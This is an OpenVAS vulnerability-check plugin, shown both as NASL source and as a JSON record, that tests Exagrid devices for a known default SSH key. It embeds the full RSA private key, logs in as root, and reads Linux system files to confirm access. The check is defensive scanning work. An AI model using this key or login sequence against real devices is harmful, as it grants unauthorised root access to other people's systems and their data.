ID OPENVAS:1361412562310105597 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2020-04-22T00:00:00
Description
The remote Exagrid device is prone to a default account authentication bypass vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
#
# Exagrid SSH Known SSH Private Key
#
# Authors:
# Michael Meyer <michael.meyer@greenbone.net>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.105597");
script_version("2020-04-22T14:19:41+0000");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Exagrid SSH Known SSH Private Key");
script_tag(name:"last_modification", value:"2020-04-22 14:19:41 +0000 (Wed, 22 Apr 2020)");
script_tag(name:"creation_date", value:"2016-04-07 17:30:40 +0200 (Thu, 07 Apr 2016)");
script_category(ACT_ATTACK);
script_family("Default Accounts");
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
script_dependencies("ssh_detect.nasl", "os_detection.nasl", "gb_default_credentials_options.nasl");
script_require_ports("Services/ssh", 22);
script_require_keys("Host/runs_unixoide");
script_mandatory_keys("ssh/server_banner/available");
script_exclude_keys("default_credentials/disable_default_account_checks");
script_tag(name:"summary", value:"The remote Exagrid device is prone to a default account authentication bypass vulnerability.");
script_tag(name:"impact", value:"This issue may be exploited by a remote attacker to gain access to sensitive information or modify system configuration.");
script_tag(name:"vuldetect", value:"Try to login with known private key.");
script_tag(name:"solution", value:"Delete the known key.");
script_tag(name:"solution_type", value:"Mitigation");
script_tag(name:"qod_type", value:"exploit");
exit(0);
}
if(get_kb_item("default_credentials/disable_default_account_checks"))
exit(0);
include("host_details.inc");
include("ssh_func.inc");
include("misc_func.inc");
port = ssh_get_port( default:22 );
if( ! soc = open_sock_tcp( port ) ) exit( 0 );
user = 'root';
key = '-----BEGIN RSA PRIVATE KEY-----
MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10
hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa
E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA
GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ
BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg
AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y
iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs
Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj
QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz
ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG
XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk
86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y
x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==
-----END RSA PRIVATE KEY-----';
login = ssh_login( socket:soc, login:user, password:NULL, priv:key, passphrase:NULL );
if(login == 0)
{
files = traversal_files("linux");
foreach pattern( keys( files ) ) {
file = files[pattern];
cmd = ssh_cmd( socket:soc, cmd:'cat /' + file );
close( soc );
if( egrep( string:cmd, pattern:pattern ) )
{
report = 'It was possible to login as user `root` with the known secret key and to execute `cat /' + file + '`. Result:\n\n' + cmd;
close( soc );
security_message( port:port, data:report );
exit( 0 );
}
}
}
if( soc ) close( soc );
exit( 99 );
{"id": "OPENVAS:1361412562310105597", "type": "openvas", "bulletinFamily": "scanner", "title": "Exagrid SSH Known SSH Private Key", "description": "The remote Exagrid device is prone to a default account authentication bypass vulnerability.", "published": "2016-04-07T00:00:00", "modified": "2020-04-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105597", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": [], "cvelist": [], "lastseen": "2020-04-26T15:01:59", "viewCount": 4, "enchantments": {"dependencies": {"references": [], "modified": "2020-04-26T15:01:59", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-26T15:01:59", "rev": 2}, "vulnersScore": 0.5}, "pluginID": "1361412562310105597", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Exagrid SSH Known SSH Private Key\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105597\");\n script_version(\"2020-04-22T14:19:41+0000\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Exagrid SSH Known SSH Private Key\");\n script_tag(name:\"last_modification\", value:\"2020-04-22 14:19:41 +0000 (Wed, 22 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-04-07 17:30:40 +0200 (Thu, 07 Apr 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"ssh_detect.nasl\", \"os_detection.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_require_keys(\"Host/runs_unixoide\");\n script_mandatory_keys(\"ssh/server_banner/available\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_tag(name:\"summary\", value:\"The remote Exagrid device is prone to a default account authentication bypass vulnerability.\");\n\n script_tag(name:\"impact\", value:\"This issue may be exploited by a remote attacker to gain access to sensitive information or modify system configuration.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to login with known private key.\");\n\n script_tag(name:\"solution\", value:\"Delete the known key.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"host_details.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = ssh_get_port( default:22 );\nif( ! soc = open_sock_tcp( port ) ) exit( 0 );\n\nuser = 'root';\nkey = '-----BEGIN RSA PRIVATE KEY-----\nMIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10\nhIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa\nE1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA\nGSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ\nBWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg\nAciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y\niYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs\nRy45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj\nQAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz\nebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG\nXLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk\n86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y\nx6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg==\n-----END RSA PRIVATE KEY-----';\n\nlogin = ssh_login( socket:soc, login:user, password:NULL, priv:key, passphrase:NULL );\n\nif(login == 0)\n{\n files = traversal_files(\"linux\");\n\n foreach pattern( keys( files ) ) {\n\n file = files[pattern];\n\n cmd = ssh_cmd( socket:soc, cmd:'cat /' + file );\n close( soc );\n\n if( egrep( string:cmd, pattern:pattern ) )\n {\n report = 'It was possible to login as user `root` with the known secret key and to execute `cat /' + file + '`. Result:\\n\\n' + cmd;\n close( soc );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nif( soc ) close( soc );\nexit( 99 );\n", "naslFamily": "Default Accounts"}